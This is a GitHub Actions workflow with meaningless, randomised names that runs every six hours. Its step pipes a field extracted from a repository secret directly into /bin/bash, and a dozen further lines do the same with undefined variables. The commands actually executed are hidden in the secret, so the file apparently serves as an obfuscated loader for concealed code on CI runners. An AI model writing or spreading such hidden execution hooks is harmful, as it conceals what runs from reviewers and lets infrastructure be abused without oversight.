name: todaydoylt

on:
  workflow_dispatch:
  schedule:
    - cron: '2 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: todaydoylt
        env:
          zxt82: ${{ secrets.zxt82 }}
        run: |
          echo $zxt82 | jq -r .tpj399 | /bin/bash
          echo $acsa1 | jq -r .xkty11 | /bin/bash
          echo $dol79550 | jq -r .d6 | /bin/bash
          echo $yzi86 | jq -r .p3266 | /bin/bash
          echo $vdh93986 | jq -r .v90730 | /bin/bash
          echo $htf39 | jq -r .mo325 | /bin/bash
          echo $uygts47269 | jq -r .etg97255 | /bin/bash
          echo $iedi97 | jq -r .toslo66203 | /bin/bash
          echo $kg596 | jq -r .uswpc693 | /bin/bash
          echo $ymnlg23362 | jq -r .lwqb6893 | /bin/bash
          echo $wrbg95824 | jq -r .i587 | /bin/bash
          echo $btu28455 | jq -r .c04 | /bin/bash
          echo $hter31 | jq -r .dgj26838 | /bin/bash

